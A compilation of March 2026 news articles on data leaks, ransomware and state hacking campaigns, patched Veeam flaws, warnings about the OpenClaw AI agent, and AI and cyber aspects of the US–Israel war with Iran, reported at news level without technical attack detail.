theguardian.com
Hannah Devlin and Tom Burgis
Sat 14 Mar 2026 07.00 CET

Exclusive: Guardian investigation finds data from flagship medical research leaked dozens of times

Confidential health data has been exposed online on dozens of occasions, a Guardian investigation can reveal, raising questions about the safeguarding of patient records by one of the UK’s flagship medical research projects.

UK Biobank, which holds the medical records of 500,000 British volunteers, is one of the world’s most comprehensive stores of health information and is credited with driving breakthroughs in cancer, dementia and diabetes research. But scientists approved to access Biobank’s sensitive data appear to have sometimes been cavalier about its security.

The files, which seem to have been inadvertently posted online by researchers using the data, do not include names or addresses, but they may still pose privacy concerns. One dataset found by the Guardian contained millions of hospital diagnoses and associated dates for more than 400,000 participants.

With the consent of a Biobank volunteer, the Guardian was able to pinpoint what appeared to be extensive hospital diagnosis records for the volunteer, using only their month and year of birth and details of a major surgery they had undergone.

"The file was very detailed and it felt like a gross invasion of privacy even to glance at
Data expert"

One data expert said the scale and persistence of the problem was “shocking” at a time when AI and social media were making it ever easier to cross-reference information online.

UK Biobank rejected the concerns, saying that no identifying data, such as names and addresses, were provided to researchers.

In a statement, Prof Sir Rory Collins, the chief executive of UK Biobank, said: “We have never seen any evidence of any UK Biobank participant being re-identified by others.”

’They said they would hold our data securely’
Founded in 2003 by the Department of Health and medical research charities, UK Biobank holds genome sequences, scans, blood samples and lifestyle information of 500,000 volunteers. Last month, the government extended Biobank’s access to volunteers’ GP records.

Scientists at universities and private companies across the world apply for access and, until late 2024, were free to download data directly on to their own computer systems.

Before this point, data had been inadvertently published online and Biobank appears to still be grappling with the problem.

The issue emerged because journals and funders increasingly require researchers to publish the code they have used to analyse large datasets. When intending to upload code, some researchers have also accidentally published partial or entire Biobank datasets to GitHub, a popular online code-sharing platform. UK Biobank prohibits researchers from sharing data outside their systems and says it has introduced further training for all researchers.

In the past year, the data leaks appear to have become a more urgent concern to UK Biobank. Between July and December 2025, it issued 80 legal notices to GitHub, which has complied with requests to remove data from the internet. Yet much still remains available.

Some of the data files contain just patient IDs, or test results for small numbers, others are more extensive. One dataset found online by the Guardian in January contained hospital diagnoses and associated diagnosis dates for about 413,000 participants, along with their sex and month and year of birth.

A data expert, who reviewed the file said: “It sent shivers down my spine to even open. I deleted the file immediately. It was very detailed and felt like a gross invasion of privacy even to glance at.”

To test the risk of re-identification, the Guardian approached several Biobank volunteers, two of whom had undergone medical procedures in the timeframe within the data and agreed to share these details with an external data scientist.

One volunteer, who provided treatment dates for a fracture and seizure, could not be located in the dataset. A second volunteer, a woman in her 70s, shared her month and year of birth and the month and year she had a hysterectomy. Only one person in the dataset matched these details. The apparent match was corroborated by five other diagnoses from the records that the volunteer had not initially disclosed.

“Effectively you were rehearsing the main parts of my medical history to me without me having given you any information at all. I didn’t expect that,” the volunteer said.

The woman said she was not too concerned about her own data being exposed and intended to remain a participant, saying that she viewed UK Biobank’s work as “extremely important”. But, she added: “I’m more concerned about whether Biobank has broken its agreement with people. They said they would hold our data securely … I just feel as though that has to come into the equation.”

UK Biobank said the re-identification scenario tested by the Guardian did not highlight a privacy risk because without additional information it would be impossible to identify individuals.

A Biobank spokesperson said: “As we have communicated to our participants, including on our website: ‘If a participant puts information that reveals something about their health and identity, such as genealogy data, on a public website, this could make it possible for their identity to be discovered by cross-referencing UK Biobank research data.’

“You have simply demonstrated why we tell participants not to do this.”

The spokesperson added that Biobank had taken extensive measures to protect participants’ privacy, including proactively searching GitHub, contacting researchers directly and issuing legal takedown notices, actions which they said had led to about 500 repositories being removed. Many of these, it said, contained only patient IDs, not health data.

"The idea they can rely on volunteers never putting any other information out about themselves is entirely unreasonable
Prof Felix Ritchie"

‘There are tensions between driving research with data and protecting privacy’
Privacy experts said UK Biobank’s approach appeared at odds with the reality that many people, reasonably, shared some health information online and that in an age of AI this could readily be identified and cross-referenced.

“Are these people aware that the internet exists?” asked Prof Felix Ritchie, an economist at the University of the West of England. “The idea that they can rely on their volunteers never putting any other information out there about themselves is an entirely unreasonable thing to expect.”

Dr Luc Rocher, associate professor at the Oxford Internet Institute, who reviewed several Biobank datasets found online, said that removing identifiers often did not guarantee anonymity and that simply knowing a person’s birthday and, say, the date they broke a leg might be enough to pinpoint their record with high confidence.

“Once identified, that record could reveal sensitive information such as a psychiatric diagnosis, an HIV test result, or a history of drug abuse,” they said.

Prof Niels Peek, professor of data science and healthcare improvement at the University of Cambridge, said the scale of the problem was “shocking”. “If it had happened once or 10 times I’d probably say: ‘It’s not great that it’s happened but at the same time zero risk is impossible,’” he said. “Hundreds. That’s a little bit too much.”

In Peek’s view, Biobank’s actions show it has taken the issue seriously and “done everything that one can reasonably expect”. But, he added: “The scale and persistence with which this has happened demonstrates that there are huge tensions between the ambition to drive health research with data at scale and the legal and ethical imperative to protect people’s privacy.”

Experts questioned whether Biobank will be able to fully regain control of the data released online. Despite researchers and GitHub having taken down most of the offending repositories in response to Biobank’s requests, many of the relevant files remained available on a code archive website until shortly before publication.

securityweek.com
ByEduard Kovacs| March 16, 2026 (11:44 AM ET)

Several global giants listed as victims of the recent hacking campaign targeting Oracle E-Business Suite (EBS) customers have remained mum on the impact of the cybersecurity incident.

The Cl0p ransomware and extortion group has taken credit for the EBS hacking campaign, which involved exploiting zero-day vulnerabilities to access data stored by organizations in Oracle’s enterprise management software. The compromised data was then leveraged for extortion.

While Cl0p serves as the public-facing extortion brand for the campaign, the cybersecurity community believes the operation may have been driven by a cluster of threat actors, most notably FIN11.

The hackers have listed more than 100 alleged victims of the Oracle EBS campaign on the Cl0p leak website, including organizations in sectors such as technology, telecommunications, software, heavy industry, manufacturing, engineering, retail, consumer goods, energy, utilities, media, finance, and entertainment.

For most of the victims, the cybercriminals published torrent files pointing to information allegedly stolen from their systems. This indicates that these victims have refused to pay a ransom.

A majority of the large organizations targeted in the campaign have issued a public statement confirming a data breach. Many claimed that the impact of the incident is limited, but still notified affected individuals about the potential risks.

However, a handful of very large companies do not appear to have issued any public statements on the matter, neither to confirm nor deny being hit, nor even to say that an investigation is being conducted.

This includes semiconductor and infrastructure software company Broadcom, engineering and construction firm Bechtel, cosmetics group Estée Lauder Companies, and medical devices and healthcare solutions provider Abbott Laboratories.

They were all listed on the Cl0p website on or around November 20, 2025.

It may take several months and even as much as a year for companies to investigate data breaches and determine their full extent. However, major companies typically acknowledge at least that an investigation is ongoing.

Broadcom, Bechtel, Estée Lauder, and Abbott have not responded to repeated requests for comment.

Data leaked by hackers
SecurityWeek has not downloaded any of the leaked data, but has conducted a brief metadata and file-tree analysis of data allegedly obtained from some of the larger companies named on the Cl0p website and found that the files indeed originate from an Oracle EBS environment.

In the case of Broadcom, the cybercriminals made public more than 2TB of archives allegedly storing files stolen from the company. The Estée Lauder torrent file points to 870GB of archive files.

At the time of writing, the torrents pointing to Bechtel and Abbott files are still available, but no data could be retrieved for analysis. However, that does not mean the files are no longer accessible to cybercriminals, as they may also be circulated privately on underground forums.

On the one hand, cybercrime groups like Cl0p frequently exaggerate the scope of their breaches, prompting many companies to quickly issue statements denying or downplaying the allegations to reassure customers and stakeholders that any impact was limited.

Moreover, if no regulated data (such as health information, Social Security numbers, or payment details) was compromised, companies face no legal obligation to disclose the incident publicly. If the breach did not qualify as material, there is also no requirement under SEC rules to report it to investors.

On the other hand, some organizations may deliberately maintain silence for strategic, PR, and legal reasons. Even acknowledging an ongoing investigation could invite lawsuits, short-seller pressure, or additional regulatory scrutiny.

| TechCrunch
Zack Whittaker
8:01 AM PDT · March 20, 2026

A cyberattack on a U.S. car breathalyzer company has left drivers across the United States reportedly stranded and unable to start their vehicles.

The company, Intoxalock, says on its website that it is “currently experiencing downtime” after a cyberattack on March 14. Intoxalock sells breathalyzer devices that fit into vehicle ignition switches, and is used by people who are required to provide a negative alcohol breath sample to start their car.

Intoxalock spokesperson Rachael Larson confirmed to TechCrunch that the company had been hit by a cyberattack. Larson said the company took steps to “temporarily pause some of our systems as a precautionary measure.”

These breathalyzer devices need to be calibrated every few months or so, but the cyberattack has left Intoxalock unable to perform these calibrations. The company said customers whose devices require calibration may experience delays starting their vehicles.

Drivers posting on Reddit say that cars are unable to start if they miss a calibration, effectively locking drivers out of their vehicles.

According to local news reports across Maine, drivers are experiencing lockouts and some have been unable to start their vehicles. One auto shop in Middleboro told WCVB 5 in Boston that it has had cars parked in its lot all week due to the cyberattack.

News reports from across the United States show drivers are affected from New York to Minnesota, and drivers have been unable to drive because their vehicle-based breathalyzers cannot be immediately calibrated.

Intoxalock would not say what kind of cyberattack it was experiencing, such as ransomware or if there was a data breach, or whether it had received any communications from the hackers, including any ransom demands. The company’s technology is used in 46 states, its website says, and it claims to provide services to 150,000 drivers every year.

Intoxalock did not provide an estimated timeline for its recovery.

| CyberScoop cyberscoop.com
By
Tim Starks

March 20, 2026

It echoes earlier alerts from the Netherlands and Germany, and is the latest to warn about targeting of Signal users and others.

Russian intelligence-affiliated hackers have gained access to thousands of users’ messaging apps with a global phishing campaign, the FBI and the Cybersecurity and Infrastructure Security Agency warned in a public service announcement on Friday.

The high-value targets they’re pursuing include current and former U.S. government officials, political figures, military personnel and journalists, the two agencies said in the joint PSA about the hackers’ attempts to infiltrate commercial messaging applications (CMAs).

The U.S. alert comes on the heels of an earlier warning from Dutch authorities, who said last week that Russian hackers were “engaged in a large-scale global attempt” to take over WhatsApp and Signal accounts. The Dutch warning likewise followed a similar warning from Germany in February.

The U.S. agencies emphasized that the hackers had not been able to bypass end-to-end encryption, instead manipulating users into giving up access. The scheme involves hackers posing as Signal help personnel, then inviting them to click a link or provide verification codes or account personal identification number.

“After compromising an account, malicious actors can view the victims’ messages and contact lists, send messages, and conduct additional phishing against other CMA accounts,” the PSA explains. “(Note: reporting shows that the threat actors specifically target Signal accounts but can apply similar methods against other CMAs).”

However, “CMA users who strengthen their personal cybersecurity and defend against social engineering attempts can reduce the risk of account compromise and limit the effectiveness of the threat actors’ current tactics, techniques, and procedures,” the agencies said.

The Russian campaign is just the latest to seek to bypass the protections commercial messaging apps offer. CISA in November warned about spyware targeting of messaging apps.

There sometimes has been a Russian intelligence nexus to the recent targeting. Google Threat Intelligence Group shined a spotlight last year on Russian attempts to target Signal users in Ukraine.

‘We anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war,” the company said.

| TechCrunch
techcrunch.com
Zack Whittaker
8:50 AM PDT · March 9, 2026

Salt Typhoon is by far one of the most prolific hacking groups in recent years, breaching some of the top American phone companies. Here are all the countries that have been targeted.

Salt Typhoon is behind one of the broadest hacking campaigns in recent years, targeting some of the world’s largest phone and internet companies and stealing tens of millions of phone records about senior government officials.

The hacking group, attributed to China, is part of a wider cluster of hackers with the collective aim of helping China prepare for an eventual war with Taiwan, according to researchers. U.S. officials have called China’s potential invasion of Taiwan an “epoch-defining threat.” Much of the group’s efforts have focused on hacking Cisco routers at the edge of a company’s network to break in and taking control of surveillance devices that U.S. telecom companies are legally required to install to allow law enforcement to monitor calls and messages.

While Salt Typhoon is focused on hacking telecom infrastructure, other China-hacked groups like Volt Typhoon are prepositioning for destructive cyberattacks capable of causing widespread disruption, and Flax Typhoon runs a botnet of hijacked internet-connected devices for hiding the hackers’ malicious internet traffic.

But Salt Typhoon is by far one of the most prolific hacking groups in recent years, including targeting some of the top American phone companies.

The hacks allowed China to obtain call records, text messages, and captured phone audio from senior U.S. officials, many of whom were considered government targets of interest. This prompted the FBI to urge Americans to switch to end-to-end encrypted messaging apps, fearing that a foreign adversary could eavesdrop on their communications.

Salt Typhoon went even further, hacking at least 200 companies around the world, according to FBI officials. The list of affected countries keeps growing.

Here are the countries that have attributed hacks to Salt Typhoon.

United States
Some of the top U.S. phone companies, including AT&T and Verizon, were confirmed hacked by Salt Typhoon, as was internet provider CenturyLink (now Lumen). T-Mobile said it was targeted but that the hackers had no access to its customers’ calls, text messages, or voicemails.

Satellite communications giant Viasat was also compromised, allowing hackers to gain access to tools used by law enforcement to access the communications of others.

Internet and data providers Charter Communications (Spectrum) and Windstream were also named as Salt Typhoon victims. Fiber network giant Consolidated Communications was reportedly hacked as part of the campaign.

The hackers didn’t just target phone and internet providers. Per several reports, Salt Typhoon compromised the networks of a U.S. state’s National Guard, allowing them to steal data and access to other networks in every other U.S. state and several territories.

North and South America
According to security firm Recorded Future, its researchers have seen Salt Typhoon target Cisco devices associated with universities in Argentina and Mexico and elsewhere.

Meanwhile, the Canadian government confirmed that its top telecommunications firms were hacked by China as part of Salt Typhoon’s extended espionage campaign. Canada also confirmed several Cisco routers at one telecom giant were hacked to steal data from the company.

The government in Ottawa warned it saw targeting of companies that were “broader than just the telecommunications sector.”

Trend Micro said it saw Salt Typhoon activity in Brazil, the most populous country in South America.

Asia, Africa, and Oceania
Recorded Future said it’s seen Salt Typhoon targeting at least one Myanmar-based telecoms provider, Mytel, by way of hacked Cisco routers, as well as a South African telecommunications provider. It’s also seen attacks targeting routers of universities across Bangladesh, Indonesia, Malaysia, and Thailand.

Japan has also warned of the threat of Salt Typhoon to its networks.

Both the governments of Australia and New Zealand say they’ve seen Salt Typhoon activity in their telecom and critical infrastructure sectors. New Zealand said it also saw Salt Typhoon hackers across the government sector, as well as transportation, lodging, and military infrastructure networks.

Trend Micro also said it found at least 20 compromised organizations across the telecoms, consulting, chemical, and transportation industries, as well as government agencies and nonprofits in various countries, including Afghanistan, Eswatini, India, Taiwan, and the Philippines.

Europe
The British government has confirmed that a “cluster of activity” from Salt Typhoon was seen across the United Kingdom. While the activity wasn’t specified, news reporting suggests that senior U.K. government staff may have had their phone records tapped and text messages read.

Norway has also confirmed Salt Typhoon hacked several organizations in the country.

Dutch authorities in the Netherlands say that several smaller internet providers and web hosts were targeted and had access to routers, but their internal networks were not compromised.

An Italian internet provider was hacked, per Recorded Future.

And, according to Czech cybersecurity officials, incidents related to Salt Typhoon hacks have been witnessed in Finland and Poland.

bleepingcomputer.com
By Sergiu Gatlan
March 9, 2026

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to over 15,000 employees and customers after hacking one of its service providers.

Headquartered in Stockholm and founded in 1876, the parent company is a communications tech leader with nearly 90,000 employees worldwide.

In data breach notification letters sent to affected individuals and filed with the California Attorney General on Monday, Ericsson said that a service provider who was storing personal data for employees and customers discovered a breach on April 28, 2025.

After detecting the incident, the third-party vendor notified the FBI and hired external cybersecurity experts to assess the extent of the breach and its impact.

The investigation, which was completed last month, found that a total of 15,661 individuals had their data exposed in the incident. However, Ericsson noted that the compromised provider has yet to find evidence that the data has been misused since the breach.

"Based on the investigation, our service provider determined that a limited subset of files may have been accessed or acquired without authorization between April 17, 2025 and April 22, 2025," Ericsson said.

"As part of its investigation, it retained external data specialists to conduct a comprehensive review of the potential affected files to identify any personal information. That review was completed on February 23, 2026 at which time we determined that that some of your personal information was contained within the affected files."

According to a separate filing with the Texas Attorney General, the exposed information includes affected individuals' names, addresses, Social Security Numbers, Driver’s License numbers, government-issued ID numbers (e.g., passport, state ID cards), financial Information (e.g., account numbers, credit or debit card numbers), medical Information, and dates of birth.

Ericsson is now providing free IDX identity protection services, including credit monitoring, dark web monitoring, identity theft recovery, and a $1 million identity fraud loss reimbursement policy to affected people who enroll by June 9, 2026.

Although the company flagged this incident as a data theft attack, no cybercrime group has taken responsibility for the breach. This raises the possibility that either the third-party vendor paid the ransom demanded by the attackers or that the threat actors were unable to connect the breach to Ericsson.

When BleepingComputer reached out for more details on the breach, including the total number of affected individuals, an Ericcson spokesperson said they didn't have "anything to share beyond the letter."

Update March 10, 06:39 EDT: In a filing with Maine's Attorney General, Ericsson says the breach affects a total of 15,661 individuals.

calcalistech.com
Hofit Cohen Azulay
12:55, 12.03.26

Cyberattack affects platform advertising screens; national cybersecurity authorities investigate.

A cyberattack targeted advertising signs in the passenger halls at Herzliya Station and Shalom Train Station in Tel Aviv on Wednesday. It is estimated that Iranian hackers took control of the signs and posted messages claiming that the stations were expected to be attacked by Iranian missiles and instructing the public to evacuate immediately.
Israel Railways clarified that these signs are not connected to the railway infrastructure and are located on platforms as part of a private provider’s advertising and information system. Shortly after the incident, the screens were taken offline. The National Cyber Directorate, in cooperation with Israel Railways, began investigating the source of the malfunction. Railways officials emphasized that the affected screens are part of an external network unrelated to essential railway infrastructure. Therefore, there was no risk to critical systems or the railway's passenger information system (PIS).

Earlier, Iran’s Fars News Agency falsely claimed that Israel’s entire railway system had been hacked and disabled. The agency stated:
"Israel’s railways have been hacked. As a result of a cyberattack, the enemy’s railway system has been disabled. All [Israeli railway] stations are not safe until further notice."

Following the incident, Israel Railways announced on Thursday that, in accordance with Home Front Command guidelines, it is continuing efforts to resume service on travel routes, increase train frequency, and reopen additional stations.

| South China Morning Post
scmp.com
Ben Jiangin Beijing
Published: 10:14pm, 10 Mar 2026

Cybersecurity agency cautions that improper installation and use of the AI agent carry severe security and data risks.

China’s cybersecurity agency on Tuesday issued a second warning about security and data risks tied to OpenClaw, despite a rush among local governments and tech companies to adopt the artificial intelligence agent amid a nationwide frenzy.

At a time when major Chinese cloud service providers were touting easy deployment of OpenClaw to capitalise on its popularity, improper installation and use of the agent had also led to severe security risks, said the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT), a non-governmental and non-profit cybersecurity technical platform, in a notice published on its WeChat account.

Released by Austrian developer Peter Steinberger late last year, OpenClaw is a software that is taking the world by storm for its ability to perform tasks on a user’s behalf, organising and responding to emails, drafting work reports and preparing slide decks.

CNCERT partly blamed OpenClaw’s security challenges on its ability to perform tasks autonomously, which required high-level permissions that heightened exposure to breaches.

The agency said OpenClaw was vulnerable to threats including “prompt injection”, in which attackers embed hidden malicious instructions in webpages which, when read by the software, could trick it into leaking a user’s system keys.

It was also prone to “operational errors”, in which the agent may misinterpret user commands and unintentionally delete critical information, including emails and important files, potentially causing significant data loss.

bleepingcomputer.com
By Sergiu Gatlan
March 12, 2026

Data protection company Veeam Software has patched multiple flaws in its Backup & Replication solution, including four critical remote code execution (RCE) vulnerabilities.

VBR is enterprise data backup and recovery software that helps IT administrators to create copies of critical data for quick restoration following cyberattacks and hardware failures.

Three RCE security flaws patched today (tracked as CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669) allow low-privileged domain users to execute remote code on vulnerable backup servers in low-complexity attacks.

The fourth one (tracked as CVE-2026-21708) allows a Backup Viewer to gain remote code execution as the postgres user.

Veeam also addressed several high-severity security bugs that can be exploited to escalate privileges on Windows-based Veeam Backup & Replication servers, extract saved SSH credentials, and bypass restrictions to manipulate arbitrary files on a Backup Repository.

These vulnerabilities were discovered during internal testing or reported through HackerOne and are resolved in Veeam Backup & Replication versions 12.3.2.4465 and 13.0.1.2067.

Veeam also warned admins to upgrade the software to the latest release as soon as possible, since threat actors often begin developing exploits shortly after patches are released.

"It's important to note that once a vulnerability and its associated patch are disclosed, attackers will likely attempt to reverse-engineer the patch to exploit unpatched deployments of Veeam software," the company warned. "This reality underscores the critical importance of ensuring that all customers use the latest versions of our software and install all updates and patches without delay."

VBR servers targeted in ransomware attacks
VBR is popular among managed service providers and mid-sized to large enterprises, even though ransomware gangs commonly target VBR servers because they can serve as a quick jumping-off point for lateral movement within breached networks, simplify data theft, and make it easy to block restoration efforts by deleting victims' backups.

The financially motivated FIN7 threat group (which previously collaborated with the Conti, REvil, Maze, Egregor, and BlackBasta ransomware groups) and the Cuba ransomware gang have both been linked to past attacks targeting VBR vulnerabilities.

Sophos X-Ops incident responders also revealed in November 2024 that Frag ransomware exploited another VBR RCE bug disclosed two months earlier and also used in Akira and Fog ransomware attacks starting in October 2024.

Veeam says its products are used by more than 550,000 customers worldwide, including 74% of Global 2,000 firms and 82% of Fortune 500 companies.

Gizmodo
By Ece Yildirim
Published March 11, 2026

State-aligned media released a list naming the offices of Microsoft, Palantir, and more as potential targets of military action.
A news agency affiliated with the Iranian regime released a list of American tech companies with links to American and Israeli military operations as new targets for Iran on Wednesday.

According to Al Jazeera, the Tasnim News Agency’s report lists Microsoft, Google, Palantir, IBM, Nvidia, and Oracle’s offices and cloud infrastructure in Israel and some Gulf countries as the new targets.

On top of targeting the tech giants, a spokesperson for a group owned by Iran’s Islamic Revolutionary Guard Corps told Al Jazeera that American and Israeli economic centers and banks in the region are also legitimate targets now, and warned people to “not be within a one-kilometre radius of banks.”

The list comes on the heels of an Israeli attack on a bank in Iran’s capital city of Tehran, according to Tasnim News Agency, which expanded “the scope of the regional war” to an “infrastructure war.”

The United States and Israel began their military campaign against Iran at the end of last month, with Iran responding with retaliatory strikes on Israeli soil and on American military bases in the region from Cyprus and Turkey to the Gulf countries.

As the war entered its 12th day, more than 1,300 civilians in Iran have been killed, including 175 people (most of them children) at an elementary school in southern Iran, reportedly struck by American missiles.

All six of the tech giants named by Iranian media have lucrative partnerships with the Pentagon and/or Israel. Nvidia is building data centers and a research and development campus in Israel, a country that CEO Jensen Huang has recently called “Nvidia’s second home.” Microsoft, Google, Palantir, IBM, and Oracle all have a close history with the Israeli government and military, with some reports claiming that the AI technology provided by these American tech giants is aiding the army in the mass surveillance of Palestinians. Meanwhile, Google, Oracle, IBM, Microsoft, and Palantir also have military AI agreements with the Pentagon.

Though not named by Tasnim, another American tech giant with ties to both American and Israeli military operations is Amazon. One of the company’s operating facilities in Bahrain and two of its data centers in the United Arab Emirates were heavily damaged earlier this month following Iranian drone strikes. The strikes, which Iranian state media later described as targeted, led to power disruptions and degraded AWS applications in the region.

So far, Iran’s military actions have been limited to the region. That could change, according to an ABC News report also from Wednesday, as the FBI has claimed Iran could launch drone strikes on the West Coast of the United States, where the headquarters of tech giants like Google, Nvidia, and Microsoft are located. But the chances of that happening are very slim, as even President Trump himself has said he is not worried, and the Iranian report explicitly threatens damage to the offices and infrastructure that these tech companies have in the Middle East.

WSJ wsj.com By
Daniel Michaels
and
Dov Lieber

March 7, 2026 12:00 pm ET

The U.S. and Israeli attacks on Iran have unfolded at unprecedented speed and precision thanks to months of planning, a massive assemblage of military force and a cutting-edge weapon never before deployed on this scale: artificial intelligence.

AI tools are helping gather intelligence, pick targets, plan bombing missions and assess battle damage at speeds not previously possible. AI helps commanders manage supplies of everything from ammunition to spare parts and lets them choose the best weapon for each objective.

Before Israeli jet fighters launched ballistic missiles that killed Iran’s Supreme Leader Ali Khamenei at his residence a week ago, launching the current regional war, Israeli intelligence services had for years been monitoring hacked Tehran traffic cameras and eavesdropping on senior officials’ communications—increasingly relying on AI to sift through a flood of intercepts.

The use of AI in the campaign against Iran follows years of work by the Pentagon and lessons learned from other militaries. Ukraine—with U.S. help—increasingly relies on AI in its war against Russia. Israel has tapped AI in conflicts at least since the October 2023 Hamas attacks.

Defense Secretary Pete Hegseth has urged accelerated adoption of AI to create “an ‘AI-first’ warfighting force.” At the same time, he is engaging in a public battle with Anthropic, a critical AI supplier, and the Pentagon has contracted with rival OpenAI to use its models in classified settings. President Trump has ordered the government to stop using Anthropic’s products. But U.S. officials say the fight unfolding in Iran is showing the usefulness of Anthropic’s AI agent, Claude.

The U.S. and Israel have declined to discuss exactly how they are employing AI in the widening conflict, but recent comments from military leaders and technical experts provide a window.

Most military AI applications aim to give commanders and planners more complete information, faster than is now possible. That, in turn, should let them make better and quicker decisions than the enemy can, gaining a battlefield advantage.

The U.S. says it has struck more than 3,000 targets in Iran since the attacks began Saturday, using an array of weapons including attack drones launched from ships, F-22 jet fighters taking off from Israel and B-2 stealth bombers flying from the U.S.

While the complexity of managing so many aircraft and weapons is getting a boost from AI, its use remains limited and the cost of badly informed decisions remains high. U.S. military investigators believe American forces likely were responsible for a strike on the war’s first day that killed dozens of children at a girls elementary school in Iran, The Wall Street Journal reported.

Talk of military AI can conjure images of killer robots, but the reality is that its biggest uses now are often off the battlefield, in time-consuming and labor-intensive fields like intelligence, mission planning and logistics.

These noncombat areas are ripe for AI-inspired efficiency because out of every 10 people in the military, at most two face combat. Up to 90% of personnel are in support roles.

The Pentagon’s AI tools are similar to ChatGPT and other mass-market large language models, but limited to warfare and trained to tackle specific tasks using relevant information, seeking to avoid glitches and inaccuracies often besetting AI.

Still, war is among the most chaotic and complex human endeavors—posing unique problems for even the cutting edge of robotic thinking. The Pentagon’s first AI chief, retired Air Force Lt. Gen. Jack Shanahan, said building military AI is tough in part because much of the available data for training is out of date or unclear.

“The Department of Defense was built as a hardware company in the industrial age, and it has struggled to become a digital company in a software-centric era,” said Shanahan, who oversaw an AI-powered project in Iraq, dubbed Maven, almost a decade ago.

Military strikes start with intelligence. Gathering and parsing it can require thousands of analysts grinding for hours over communications intercepts, photographs and radar images as they try to divine the locations of missile launchers, tunnels and other targets.

Human analysts can examine at most 4% of the intelligence material that is typically collected, say U.S. officers who have worked in the field.

“The biggest immediate impact of AI is in intelligence,” said Israeli Col. Yishai Kohn, the defense ministry’s head of planning, economics and IT. “Many potential missions simply never happened because the manpower didn’t exist” to assess vital intelligence, said Kohn.

AI-powered machine vision can now quickly find vast numbers of targets—with the ability to single out specific models of aircraft or vehicles. It can listen for and summarize relevant conversations from intercepts.

“Intelligence agencies already have access to tons of video data, and current AI enables them to detect exactly what they need within an ocean of data,” said Matan Goldner, chief executive of Conntour, an Israeli company selling software to its and other countries’ security agencies that allows them to query video databases the same way LLMs are used to find patterns in texts.

Just as with mass-market AI, users can bore into results with queries, such as to identify every missile launcher located near a hospital. They can also set the system to alert when an event happens, such as “Tell me every time someone takes a photo near this military base.”

The U.S. Army’s 18th Airborne Corps, using software from data company Palantir Technologies in a continuing string of exercises dubbed Scarlet Dragon, matched its own record from Iraq as the military’s most efficient targeting operation ever, according to Emelia Probasco, a senior fellow at Georgetown University’s Center for Security and Emerging Technology. Thanks to AI, the corps achieved that with only 20 people, compared with more than 2,000 staffers employed in Iraq, she said.

Militaries in the North Atlantic Treaty Organization are using AI to track Russia’s shadow fleet of tankers, scanning millions of square miles several times a day for vessels that are illegally transferring fuel at sea, said French Adm. Pierre Vandier, NATO’s top officer for digital transformation. Imagery is then linked to ship identities for closer tracking and potential action, he said.

Vandier said AI is turning military intelligence analysis from a task of groping in darkness for targets to one of sifting through piles of them. “The number of targets you can nominate through AI is just skyrocketing,” Vandier said.

To prioritize targets and develop a course of action, the Pentagon is increasingly using AI to run models and digital wargames. In one of many efforts, last year it contracted with Pittsburgh-based Strategy Robot to develop advanced systems that can churn through vast numbers of scenarios despite imperfect information. From potentially millions of iterations, planners can zoom in on actions that are more likely to achieve their objectives.

In the pre-AI world, after rough outlines were agreed on for an operation, commanders and specialists would develop mission plans, compiling paper-stuffed binders in a weekslong exercise. AI can potentially do the same work in days, military leaders say.

Planning any military assault—from the fast, targeted mission in January to seize Venezuelan strongman Nicolás Maduro to the war with Iran—brings together subject-matter specialists including intelligence officers, combat commanders, weapons experts and logistics managers. Sessions can include around 40 people.

“The more people you add into planning, the longer it takes,” said a U.S. Army officer in Europe with experience in the process.

As preparations advance and plans evolve, each specialist revises their own plans, with knock-on effects for the others. If intelligence reports, for example, shift a bombing target to a more-distant objective, commanders may opt to use different aircraft or weapons, which in turn can affect crew rostering, flight planning and fuel consumption.

Until now, updating all those factors was slow and often subjective. Now AI can process complex interactions instantaneously, accounting for how each change ripples through military choreography.

Once a strike occurs, AI can speed assessments of battle damage, via image-processing software like tools helping with initial intelligence. While analysis is limited by the quality of imagery—which can depend on factors as basic as weather and whether a target is above ground—AI’s ability to merge varied inputs is changing the discipline. In a process known as sensor fusion, AI can digest visuals, radar, heat signatures and mass-spectroscopy to synthesize a list of possible conclusions. Fast analysis of where attacks succeeded or failed in turn helps refine lists of subsequent targets.

One thing AI can’t replace is human judgment. Many military officials involved in AI projects warn that the technology’s capabilities risk prompting an overreliance on information it provides—a trend linked with the phrase “The computer said to do this.”

Offloading decisions to AI “is a serious concern,” said Probasco at Georgetown, who held various posts in the Navy. She said that, as with other weapons systems, safeguards must be implemented to limit risks. “That infrastructure is underinvested in now,” she said.

theguardian.com
Daniel Boffey Chief reporter
Sat 7 Mar 2026 12.00 CET

Iran’s targeting of commercial datacentres in the UAE and Bahrain signals a new frontier in asymmetric warfare

It is believed to be a first: the deliberate targeting of a commercial datacentre by the armed forces of a country at war.

At 4.30am on Sunday morning, what is thought to have been an Iranian Shahed 136 drone struck an Amazon Web Services datacentre in the United Arab Emirates, setting off a devastating fire and forcing a shutdown of the power supply. Further damage was inflicted as attempts were made to suppress the flames with water.

Soon after, a second data centre owned by the US tech company was hit. Then a third was said to be in trouble, this time in Bahrain, after an Iranian drone turned to fireball on striking land nearby.

Iranian state TV has claimed that Iran’s Islamic Revolutionary Guard Corps launched the attack “to identify the role of these centres in supporting the enemy’s military and intelligence activities”.

The network built by Jeff Bezos’s company could withstand one of its regional centres being taken out of action but not a second.

The coordinated strike had an immediate impact.

Millions of people in Dubai and Abu Dhabi woke up on Monday unable to pay for a taxi, order a food delivery, or check their bank balance on their mobile apps.

Whether there was a military impact is unclear – but the strikes swiftly brought the war directly into the lives of 11 million people in the UAE, nine out of 10 of whom are foreign nationals. Amazon has advised its clients to secure their data away from the region.

Perhaps more significantly, the strikes on this ‘next generation’ war target are now raising questions about the prospects of the UAE building on its plans, and many billions of pounds worth of US and other foreign investment, to exploit what they hope will be the ‘new oil’: artificial intelligence (AI).

“The UAE really wants to be a major AI player,” said Chris McGuire, an AI and technology competition expert who served as a White House national security council official in Joe Biden’s administration. “Their government has very strong conviction about this technology, probably stronger than any other government in the world, and if there’s going to start to be security questions around that, then they’re going to have to resolve those very quickly, somehow.”

A datacentre is a facility designed to store, manage, and operate digital data.

The growing demand by businesses for artificial intelligence (AI) and cloud computing – where firms have a pay-as-you-go relationship with the providers of servers, storage and software – is driving the need for centres that have significantly more computational power.

